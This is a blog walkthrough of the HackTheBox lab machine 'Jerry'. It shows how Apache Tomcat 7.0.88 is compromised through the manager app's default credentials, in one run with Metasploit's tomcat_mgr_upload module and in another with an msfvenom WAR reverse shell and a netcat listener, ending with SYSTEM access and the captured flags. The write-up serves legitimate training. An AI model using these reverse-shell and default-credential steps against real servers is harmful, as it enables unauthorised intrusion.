Jerry HackTheBox WalkThrough

This is Jerry HackTheBox machine walkthrough and is also the 16th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Jerry HTB machine in two different ways. One using metasploit and other without metasploit. Before starting let us know something about this machine. It is a Windows box with IP address 10.10.10.95 and difficulty easy assigned by its maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Jerry machine by pinging IP 10.10.10.95. If all goes correct then start hacking. As usual, I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-

Scanning

$ sudo nmap -sC -sV -oN Jerry.nmap 10.10.10.95

Performing nmap scan during Jerry HackTheBox Machine walkthrough

Nmap revealed only port 8080 as open. Let us perform full port scan because there may be chances that some ports may be opened which is not listed in nmap’s top 1000 ports. Nmap full port scan gave the same number of open ports as it was given by default port scan. So, we have only port 8080 open and Apache tomcat is running over it. The version is 7.0.88 which appears to be a lot vulnerable as compared to current version 9. Also tomcat web server has many number of vulnerabilities if you see its changelog on its website.

Soon I get Information about any software and its version then my next step is to check for possible vulnerabilities and their exploits this version is affected with. After googling Apache tomcat 7.0.88 exploit found that it is vulnerable to Authenticated Upload Code Execution and the best part of it is that it has also a metasploit module present by the name exploit/multi/http/tomcat_mgr_upload. For more information check this GitHub post on rapid7 repository.

As it is an authenticated File Upload vulnerability so we will require a valid credential to exploit this vulnerability. But till now we don’t know any valid credential of this website which is running over URL http://10.10.10.95:8080. This URL has a default tomcat webserver installation page. So there may be chances that the application manager credential of this webserver will be default. The application manager page can be accessed at http://10.10.10.95:8080/manager/html. When I tried to login with the default credential tomcat: s3cret I could easily logged in. So here out credential is tomcat: s3cret.

When I tried to exploit this vulnerability using exploit/multi/http/tomcat_mgr_upload module I could easily get shell. Let us get user shell using metasploit.

Getting User Shell With Metasploit – Method 1

msf6 > search tomcat_mgr

msf6 > use exploit/multi/http/tomcat_mgr_upload

msf6 exploit(multi/http/tomcat_mgr_upload) > set PAYLOAD java/meterpreter/reverse_tcp

msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.10.14.3

msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95

msf6 exploit(multi/http/tomcat_mgr_upload) > set HTTPUSERNAME tomcat

msf6 exploit(multi/http/tomcat_mgr_upload) > set HTTPPASSWORD s3cret

msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080

msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

meterpreter > sysinfo

Getting User shell via method 1 using metasploit

We have got user shell. Let us upgrade it to fully qualified windows CMD shell so that we can run more advanced windows command through it.

Upgrading Shell

meterpreter > shell

Shell upgrade in Jerry hackthebox machine walkthrough

So we have a fully qualified windows CMD shell. When I tried to check the current username through which we are logged in in this machine, it is NT authority\system. This NT Authority user has highest privilege in windows OS even higher than the administrator user. We can now say we have full access over Jerry machine and hence we don’t require any privilege escalation over it. Now, we can capture user and root flag from their respective directories.

Let us exploit this machine without metasploit because we should also have some alternative approach if it is already available.

Getting User Shell Without Metasploit – Method 2

To exploit this vulnerability without metasploit follow the given steps. The exploitation steps are similar to Tabby HTB machine which I have already walked through. Check it here. In tabby machine I have exploited this vulnerability using tomcat CLI web application access feature, for more info check this documentation from tomcat. In this walkthrough I will exploit this vulnerability via Graphical User Interface panel of tomcat server.

So to exploit this vulnerability follow the given steps.

1. Create a war extension reverse shell using msfvenom.

2. Login into tomcat manager panel using credential tomcat: s3cret through URL http://10.10.10.95:8080/manager/html  and deploy the shell.

3. List the deployed shell using the URL http://10.10.10.95:8080/manager/text/list.

4. Start netcat listener on your Kali machine to receive the reverse connection from the deployed shell.

5. Open the URL http://10.10.10.95:8080/shell/  to execute the shell. That’s all you will found reverse connection on your netcat listener.

Create Reverse Shell

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.197 LPORT=1234 -f war > shell.war

Creating reverse shell using msfvenom

Deploy the Reverse Shell

Login to http://10.10.10.95:8080/manager/html using the credential tomcat: s3cret & deploy the shell.

Uploading shell via GUI tomcat manager panel in Jerry htb walkthrough

List Deployed Shell

Open http://10.10.10.95:8080/manager/text/list in web browser to list all the deployed shell.

Listing the deployed shell

Start Netcat Listener

$ nc -nvlp 1234

Execute the Deployed Shell

Open http://10.10.10.95:8080/shell/ in web browser to execute the deployed shell and get connection on your netcat listener.

Getting User shell via method 2 without metasploit

We have got user shell and that too with NT Authority\system privilege. Let us capture user and root flags.

Capture User & Root Flag

$ type C:\Users\Administrator\Desktop\flags\"2 for the price of 1.txt"

Getting User and root shell in Jerry htb writeup

This was how I rooted to Jerry HackTheBox machine with and without metasploit. Hope you have got something to learn from this box walkthrough and my methodology. Thanks for reading this. For any query and suggestion feel free to ping us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/